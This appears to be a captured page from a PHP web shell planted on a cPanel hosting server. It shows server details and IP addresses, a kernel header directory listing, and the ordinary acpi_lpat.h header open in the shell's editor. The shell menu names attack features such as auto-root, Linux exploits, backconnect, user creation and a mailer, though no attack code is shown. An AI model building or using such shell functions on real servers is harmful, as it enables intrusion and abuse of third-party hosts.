Linux cpanel.rrshost.in 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64
Apache
: 109.123.238.221 | : 172.70.80.110
128 Domain
8.2.28
aev999
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
src /
linux-headers-5.15.0-25 /
include /
acpi /
[ HOME SHELL ]
Name
Size
Permission
Action
platform
[ DIR ]
drwxr-xr-x
acbuffer.h
8.92
KB
-rw-r--r--
acconfig.h
7.41
KB
-rw-r--r--
acexcep.h
16.94
KB
-rw-r--r--
acnames.h
2.19
KB
-rw-r--r--
acoutput.h
16.37
KB
-rw-r--r--
acpi.h
1.33
KB
-rw-r--r--
acpi_bus.h
20.5
KB
-rw-r--r--
acpi_drivers.h
2.55
KB
-rw-r--r--
acpi_io.h
723
B
-rw-r--r--
acpi_lpat.h
1.16
KB
-rw-r--r--
acpi_numa.h
970
B
-rw-r--r--
acpiosxf.h
11.35
KB
-rw-r--r--
acpixf.h
30.63
KB
-rw-r--r--
acrestyp.h
19.05
KB
-rw-r--r--
actbl.h
18.35
KB
-rw-r--r--
actbl1.h
43.13
KB
-rw-r--r--
actbl2.h
57.14
KB
-rw-r--r--
actbl3.h
21.87
KB
-rw-r--r--
actypes.h
41.67
KB
-rw-r--r--
acuuid.h
3.44
KB
-rw-r--r--
apei.h
1.34
KB
-rw-r--r--
battery.h
594
B
-rw-r--r--
button.h
401
B
-rw-r--r--
cppc_acpi.h
4.24
KB
-rw-r--r--
ghes.h
3.59
KB
-rw-r--r--
hed.h
370
B
-rw-r--r--
nfit.h
351
B
-rw-r--r--
pcc.h
651
B
-rw-r--r--
pdc_intel.h
1.02
KB
-rw-r--r--
processor.h
11.66
KB
-rw-r--r--
reboot.h
201
B
-rw-r--r--
video.h
2.8
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : acpi_lpat.h
/* SPDX-License-Identifier: GPL-2.0-only */ /* * acpi_lpat.h - LPAT table processing functions * * Copyright (C) 2015 Intel Corporation. All rights reserved. */ #ifndef ACPI_LPAT_H #define ACPI_LPAT_H struct acpi_lpat { int temp; int raw; }; struct acpi_lpat_conversion_table { struct acpi_lpat *lpat; int lpat_count; }; #ifdef CONFIG_ACPI int acpi_lpat_raw_to_temp(struct acpi_lpat_conversion_table *lpat_table, int raw); int acpi_lpat_temp_to_raw(struct acpi_lpat_conversion_table *lpat_table, int temp); struct acpi_lpat_conversion_table *acpi_lpat_get_conversion_table(acpi_handle handle); void acpi_lpat_free_conversion_table(struct acpi_lpat_conversion_table *lpat_table); #else static int acpi_lpat_raw_to_temp(struct acpi_lpat_conversion_table *lpat_table, int raw) { return 0; } static int acpi_lpat_temp_to_raw(struct acpi_lpat_conversion_table *lpat_table, int temp) { return 0; } static struct acpi_lpat_conversion_table *acpi_lpat_get_conversion_table( acpi_handle handle) { return NULL; } static void acpi_lpat_free_conversion_table(struct acpi_lpat_conversion_table *lpat_table) { } #endif #endif
Close